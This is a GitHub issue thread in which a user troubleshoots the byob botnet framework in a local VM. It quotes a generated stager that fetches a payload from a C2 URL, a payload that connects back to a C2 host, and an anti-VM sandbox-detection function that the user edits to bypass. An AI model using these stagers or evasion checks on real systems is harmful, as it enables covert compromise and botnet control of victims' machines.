### ISSUE TITLE
Network problems running localhost

### ISSUE THREAD

**Issue by panpansh** [malwaredllc/byob#253]
dear @malwaredllc,
Trying to run locally on VM.

```bash
$ ./byob_nix_amd64_y92 --debug
Traceback (most recent call last):
  File "urllib/request.py", line 1317, in do_open
  File "http/client.py", line 1252, in request
  File "http/client.py", line 1298, in _send_request
  File "http/client.py", line 1247, in endheaders
  File "http/client.py", line 1026, in _send_output
  File "http/client.py", line 966, in send
  File "http/client.py", line 938, in connect
  File "socket.py", line 727, in create_connection
  File "socket.py", line 716, in create_connection
TimeoutError: [Errno 110] Connection timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "byob_nix_amd64_y92.py", line 5, in <module>
  File "<string>", line 1, in <module>
  File "urllib/request.py", line 222, in urlopen
  File "urllib/request.py", line 525, in open
  File "urllib/request.py", line 543, in _open
  File "urllib/request.py", line 503, in _call_chain
  File "urllib/request.py", line 1345, in http_open
  File "urllib/request.py", line 1319, in do_open
urllib.error.URLError: <urlopen error [Errno 110] Connection timed out>
[7885] Failed to execute script byob_nix_amd64_y92
```

web-gui : 
core/loader.py and generated modules/payloads/xxx.py : 
- def add_remote_repo(modules, base_url='http://**localhost:8000**/'):
- def remote_repo(modules, base_url='http://**localhost:8000**/'):

but looking netstat nothing listening on 8000 : 
```bash
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      7135/python3        
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      7135/python3        
tcp        0      0 0.0.0.0:1338            0.0.0.0:*               LISTEN      7142/python3        
tcp        0      0 0.0.0.0:1339            0.0.0.0:*               LISTEN      7139/python3 
```

generated payload : 
```bash
if __name__ == '__main__':
    _payload = Payload(host='xx.xx.xx.xx(my real external ip)', port='1337', gui='1', owner='test')
    _payload.run()
```
stager : 
```bash
if __name__ == '__main__':
    _run = run(url='http://xx.xx.xx.xx(my real external ip):1338//payloads/y92.py')
```
where we need localhost or 127.0.0.1 if generated from localhost or 127.0.0.1, did you see ?

Best regards.

**Comment by th30c05** [comment]
Client // 
12. Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected

You can't use it in a VM

**Comment by panpansh** [comment]
> Client //
> 12. Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected
> 
> You can't use it in a VM

I think this in core/stagers.py did the trick :
```python
def environment():
    environment = [key for key in os.environ if 'VBOX' in key]
    processes = [line.split()[0 if os.name == 'nt' else -1] for line in os.popen('tasklist' if os.name == 'nt' else 'ps').read().splitlines()[3:] if line.split()[0 if os.name == 'nt' else -1].lower().split('.')[0] in ['xenservice', 'vboxservice', 'vboxtray', 'vmusrvc', 'vmsrvc', 'vmwareuser','vmwaretray', 'vmtoolsd', 'vmcompute', 'vmmem']]
    #return bool(environment + processes)
    return bool(True)
```

**Comment by th30c05** [comment]
I think if you remove your hypervisor name from de line 3 list you can use it in a VM

**Comment by panpansh** [comment]
The problem related to the external ip is not resolved, the target ip should be the ip from which the binary was generated. And not systematic the public ip. Or being able to choose I don't know. However, that doesn't explain port 8000 either.

**Comment by panpansh** [comment]
For the IP, I need to add an **options value to the web-gui/buildyourownbotnet/api/payload/routes.py file and use it in web-gui/buildyourownbotnet/client.py if value is set as an alternative of C2_HOST.

But I Always dont understand the 8000 port :/

**Comment by panpansh** [comment]
It works :
https://github.com/panpansh/byob/tree/local-use-and-vm/

But I Always dont understand the 8000 port :/
